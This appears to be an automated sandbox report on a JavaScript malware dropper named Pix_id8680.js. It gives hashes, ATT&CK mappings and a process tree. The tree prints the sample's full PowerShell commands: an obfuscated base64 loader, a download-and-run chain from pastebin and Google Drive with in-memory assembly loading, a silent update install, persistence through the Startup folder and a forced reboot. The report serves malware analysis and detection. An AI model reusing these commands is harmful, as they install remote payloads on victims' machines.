e38b8f0ae53c24d62f7b0580891be2bfc4a3c855dcf2ee01fc64c0439777bdc9

General

Target

Pix_id8680.js
Size

18KB
MD5

1311ee7d5350ada4e1670432f2f2618f
SHA1

e25c980202fcdf06511734c37ca703e012626c62
SHA256

e38b8f0ae53c24d62f7b0580891be2bfc4a3c855dcf2ee01fc64c0439777bdc9
SHA512

187f23f3a381563c2eeb9c273ddd34bd9c044283579f6000a1dc6595a62aa50cf4faa28f644107140f66a8e234bf5258bfcc30930c70143edcdf966c747a814a
SSDEEP

384:PnmDxlzTVyhWrKLDrRX/Y3CBOj0xDusFM623U84:vmDxvVQrB/YSBOj0xKsMlH4

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/gk5zDwdG

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2592	powershell.exe
5	2592	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pix_id8680.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pix_id8680.js	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2596	powershell.exe
2592	powershell.exe
1516	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
3	drive.google.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2596	powershell.exe
2592	powershell.exe
2244	powershell.exe
1516	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2820 wrote to memory of 2596	2820	wscript.exe	30
PID 2820 wrote to memory of 2596	2820	wscript.exe	30
PID 2820 wrote to memory of 2596	2820	wscript.exe	30
PID 2596 wrote to memory of 2592	2596	powershell.exe	32
PID 2596 wrote to memory of 2592	2596	powershell.exe	32
PID 2596 wrote to memory of 2592	2596	powershell.exe	32
PID 2592 wrote to memory of 2244	2592	powershell.exe	33
PID 2592 wrote to memory of 2244	2592	powershell.exe	33
PID 2592 wrote to memory of 2244	2592	powershell.exe	33
PID 2244 wrote to memory of 292	2244	powershell.exe	34
PID 2244 wrote to memory of 292	2244	powershell.exe	34
PID 2244 wrote to memory of 292	2244	powershell.exe	34
PID 2592 wrote to memory of 1516	2592	powershell.exe	35
PID 2592 wrote to memory of 1516	2592	powershell.exe	35
PID 2592 wrote to memory of 1516	2592	powershell.exe	35

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $FDGOy_TzTjf = 'JレBWレGUレcgBwレG8レdwBlレHIレIレレ9レCレレJレBoレG8レcwB0レC4レVgBlレHIレcwBpレG8レbgレuレE0レYQBqレG8レcgレuレEUレcQB1レGEレbレBzレCgレMgレpレDsレSQBmレCレレKレレkレFYレZQByレHレレbwB3レGUレcgレpレCレレewレkレHレレYQBzレHQレYQレgレD0レIレBbレFMレeQBzレHQレZQBtレC4レSQBPレC4レUレBhレHQレaレBdレDoレOgBHレGUレdレBUレGUレbQBwレFレレYQB0レGgレKレレpレDsレZレBlレGwレIレレoレCQレcレBhレHMレdレBhレCレレKwレgレCcレXレBVレHレレdwBpレG4レLgBtレHMレdQレnレCkレOwレkレFUレUgBMレEsレQgレgレD0レIレレnレGgレdレB0レHレレcwレ6レC8レLwBkレHIレaQB2レGUレLgBnレG8レbwBnレGwレZQレuレGMレbwBtレC8レdQBjレD8レZQB4レHレレbwByレHQレPQBkレG8レdwBuレGwレbwBhレGQレJgBpレGQレPQレnレDsレJレBXレGkレbgBWレGUレcgレgレD0レIレレkレGUレbgB2レDoレUレBSレE8レQwBFレFMレUwBPレFIレXwBBレFIレQwBIレEkレVレBFレEMレVレBVレFIレRQレuレEMレbwBuレHQレYQBpレG4レcwレoレCcレNgレ0レCcレKQレ7レGkレZgレgレCgレJレBXレGkレbgBWレGUレcgレpレCレレewレkレFUレUgBMレEsレQgレgレD0レIレレoレCQレVQBSレEwレSwBCレCレレKwレgレCcレVwレxレDEレMgBBレGQレUレBmレEkレMレBQレEMレNwBoレGIレcwBjレGkレXwレ1レF8レMレBfレGUレVQレ3レE4レdwBNレFoレaレBmレDQレeレレnレCkレIレレ7レH0レZQBsレHMレZQレgレHsレJレBVレFIレTレBLレEIレIレレ9レCレレKレレkレFUレUgBMレEsレQgレgレCsレIレレnレDEレYgByレGoレNQBqレHEレbgBxレFIレeレBDレEQレNgBWレGgレZgBoレEEレbgレyレHIレYwBWレGYレcwBSレG8レNwBEレDgレZwByレCcレKQレgレDsレfQレ7レCQレTwBDレFIレaQBhレCレレPQレgレCgレTgBlレHcレLQBPレGIレagBlレGMレdレレgレE4レZQB0レC4レVwBlレGIレQwBsレGkレZQBuレHQレKQレgレDsレJレBPレEMレUgBpレGEレLgBFレG4レYwBvレGQレaQBuレGcレIレレ9レCレレWwBTレHkレcwB0レGUレbQレuレFQレZQB4レHQレLgBFレG4レYwBvレGQレaQBuレGcレXQレ6レDoレVQBUレEYレOレレgレDsレJレBPレEMレUgBpレGEレLgBEレG8レdwBuレGwレbwBhレGQレRgBpレGwレZQレoレCQレVQBSレEwレSwBCレCwレIレレkレHレレYQBzレHQレYQレgレCsレIレレnレFwレVQBwレHcレaQBuレC4レbQBzレHUレJwレpレCレレOwレkレEYレbwBsレGQレUwB0レGEレcgB0レHUレcレレgレD0レIレレoレCcレQwレ6レFwレVQBzレGUレcgBzレFwレJwレgレCsレIレBbレEUレbgB2レGkレcgBvレG4レbQBlレG4レdレBdレDoレOgBVレHMレZQByレE4レYQBtレGUレIレレpレDsレJレBmレGkレbレBlレCレレPQレgレCgレJレBwレGEレcwB0レGEレIレレrレCレレJwBcレFUレcレB3レGkレbgレuレG0レcwB1レCcレKQレ7レCレレcレBvレHcレZQByレHMレaレBlレGwレbレレuレGUレeレBlレCレレdwB1レHMレYQレuレGUレeレBlレCレレJレBmレGkレbレBlレCレレLwBxレHUレaQBlレHQレIレレvレG4レbwByレGUレcwB0レGEレcgB0レCレレOwレgレEMレbwBwレHkレLQBJレHQレZQBtレCレレJwレlレEQレQwBQレEoレVQレlレCcレIレレtレEQレZQBzレHQレaQBuレGEレdレBpレG8レbgレgレCgレIレレkレEYレbwBsレGQレUwB0レGEレcgB0レHUレcレレgレCsレIレレnレFwレQQBwレHレレRレBhレHQレYQBcレFIレbwBhレG0レaQBuレGcレXレBNレGkレYwByレG8レcwBvレGYレdレBcレFcレaQBuレGQレbwB3レHMレXレBTレHQレYQByレHQレIレBNレGUレbgB1レFwレUレByレG8レZwByレGEレbQBzレFwレUwB0レGEレcgB0レHUレcレレnレCレレKQレgレC0レZgBvレHIレYwBlレCレレOwBwレG8レdwBlレHIレcwBoレGUレbレBsレC4レZQB4レGUレIレレtレGMレbwBtレG0レYQBuレGQレIレレnレHMレbレBlレGUレcレレgレDEレOレレwレCcレOwレgレHMレaレB1レHQレZレBvレHcレbgレuレGUレeレBlレCレレLwByレCレレLwB0レCレレMレレgレC8レZgレgレH0レZQBsレHMレZQレgレHsレWwBTレHkレcwB0レGUレbQレuレE4レZQB0レC4レUwBlレHIレdgBpレGMレZQBQレG8レaQBuレHQレTQBhレG4レYQBnレGUレcgBdレDoレOgBTレGUレcgB2レGUレcgBDレGUレcgB0レGkレZgBpレGMレYQB0レGUレVgBhレGwレaQBkレGEレdレBpレG8レbgBDレGEレbレBsレGIレYQBjレGsレIレレ9レCレレewレkレHQレcgB1レGUレfQレ7レFsレUwB5レHMレdレBlレG0レLgBOレGUレdレレuレFMレZQByレHYレaQBjレGUレUレBvレGkレbgB0レE0レYQBuレGEレZwBlレHIレXQレ6レDoレUwBlレGMレdQByレGkレdレB5レFレレcgBvレHQレbwBjレG8レbレレgレD0レIレBbレFMレeQBzレHQレZQBtレC4レTgBlレHQレLgBTレGUレYwB1レHIレaQB0レHkレUレByレG8レdレBvレGMレbwBsレFQレeQBwレGUレXQレ6レDoレVレBsレHMレMQレyレDsレJレBhレHYレUレBDレGEレXwBnレHEレQQBhレHUレIレレ9レCレレKレBOレGUレdwレtレE8レYgBqレGUレYwB0レCレレTgBlレHQレLgBXレGUレYgBDレGwレaQBlレG4レdレレpレDsレJレBhレHYレUレBDレGEレXwBnレHEレQQBhレHUレLgBFレG4レYwBvレGQレaQBuレGcレIレレ9レCレレWwBTレHkレcwB0レGUレbQレuレFQレZQB4レHQレLgBFレG4レYwBvレGQレaQBuレGcレXQレ6レDoレVQBUレEYレOレレ7レCQレYQB2レFレレQwBhレF8レWgBiレEsレaQBzレCレレPQレgレCQレYQB2レFレレQwBhレF8レZwBxレEEレYQB1レC4レRレBvレHcレbgBsレG8レYQBkレFMレdレByレGkレbgBnレCgレIレレnレGgレdレB0レHレレcwレ6レC8レLwBwレGEレcwB0レGUレYgBpレG4レLgBjレG8レbQレvレHIレYQB3レC8レZwBrレDUレegBEレHcレZレBHレCcレIレレpレDsレJレBhレHYレUレBDレGEレXwBnレHEレQQBhレHUレIレレ9レCレレJレBhレHYレUレBDレGEレXwBnレHEレQQBhレHUレLgBEレG8レdwBuレGwレbwBhレGQレUwB0レHIレaQBuレGcレKレレgレCQレYQB2レFレレQwBhレF8レWgBiレEsレaQBzレCレレKQレ7レFsレQgB5レHQレZQBbレF0レXQレgレCQレYQB2レFレレQwBhレF8レVQBRレFレレcレBaレCレレPQレgレFsレUwB5レHMレdレBlレG0レLgBDレG8レbgB2レGUレcgB0レF0レOgレ6レEYレcgBvレG0レQgBhレHMレZQレ2レDQレUwB0レHIレaQBuレGcレKレレgレCQレYQB2レFレレQwBhレF8レZwBxレEEレYQB1レC4レUgBlレHレレbレBhレGMレZQレoレCレレJwCTIToレkyEnレCレレLレレgレCcレQQレnレCレレKQレgレCkレOwBbレFMレeQBzレHQレZQBtレC4レQQBwレHレレRレBvレG0レYQBpレG4レXQレ6レDoレQwB1レHIレcgBlレG4レdレBEレG8レbQBhレGkレbgレuレEwレbwBhレGQレKレレgレCQレYQB2レFレレQwBhレF8レVQBRレFレレcレBaレCレレKQレuレEcレZQB0レFQレeQBwレGUレKレレgレCcレQwBsレGEレcwBzレEwレaQBiレHIレYQByレHkレMwレuレEMレbレBhレHMレcwレxレCcレIレレpレC4レRwBlレHQレTQBlレHQレaレBvレGQレKレレgレCcレcレByレEYレVgBJレCcレIレレpレC4レSQBuレHYレbwBrレGUレKレレkレG4レdQBsレGwレLレレgレFsレbwBiレGoレZQBjレHQレWwBdレF0レIレレoレCレレJwB0レHgレdレレuレDEレLwレyレDEレMgレuレDEレNgレuレDUレMwレyレC4レNQレxレC8レLwレ6レHレレdレB0レGgレJwレgレCwレIレレnレCUレRレBDレFレレSgBVレCUレJwレsレCレレJwBUレHIレdQBlレCcレIレレpレCレレKQレ7レH0レOwレ=';$FDGOy_TzTjf = $FDGOy_TzTjf.replace('レ','A');$FDGOy_TzTjf = [System.Convert]::FromBase64String( $FDGOy_TzTjf ) ;$FDGOy_TzTjf = [System.Text.Encoding]::Unicode.GetString( $FDGOy_TzTjf );$FDGOy_TzTjf = $FDGOy_TzTjf.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js');powershell $FDGOy_TzTjf
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Verpower = $host.Version.Major.Equals(2);If ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$URLKB = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ($WinVer) {$URLKB = ($URLKB + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$URLKB = ($URLKB + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$OCRia = (New-Object Net.WebClient) ;$OCRia.Encoding = [System.Text.Encoding]::UTF8 ;$OCRia.DownloadFile($URLKB, $pasta + '\Upwin.msu') ;$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$avPCa_gqAau = (New-Object Net.WebClient);$avPCa_gqAau.Encoding = [System.Text.Encoding]::UTF8;$avPCa_ZbKis = $avPCa_gqAau.DownloadString( 'https://pastebin.com/raw/gk5zDwdG' );$avPCa_gqAau = $avPCa_gqAau.DownloadString( $avPCa_ZbKis );[Byte[]] $avPCa_UQPpZ = [System.Convert]::FromBase64String( $avPCa_gqAau.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $avPCa_UQPpZ ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'txt.1/212.16.532.51//:ptth' , 'C:\Users\Admin\AppData\Local\Temp\Pix_id8680.js', 'True' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2244
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KV0HMZ4Y3S2PQWN5K1D7.temp

Filesize
7KB

MD5
463d5301886fe2fe77c16400a049f597

SHA1
0db1265f4c2889954dd744416ab37b31093cd64e

SHA256
af5d4e3a6c79872e58099cf528fcc24d4d354ece23c4a6c32d608ad316300a2d

SHA512
3f702a00c1a810dc10dc978766bbf68eb5ff346e8ecd18d4644c541256346f533b102dee8004f529148bf8e87f1b1b451a0fac8e58f40fe1741ea789fed88879

Download Submit
memory/2596-4-0x000007FEF579E000-0x000007FEF579F000-memory.dmp

Filesize
4KB

Download
memory/2596-10-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-9-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-8-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-7-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2596-6-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-5-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

Filesize
2.9MB

Download
memory/2596-11-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-29-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-30-0x000007FEF579E000-0x000007FEF579F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing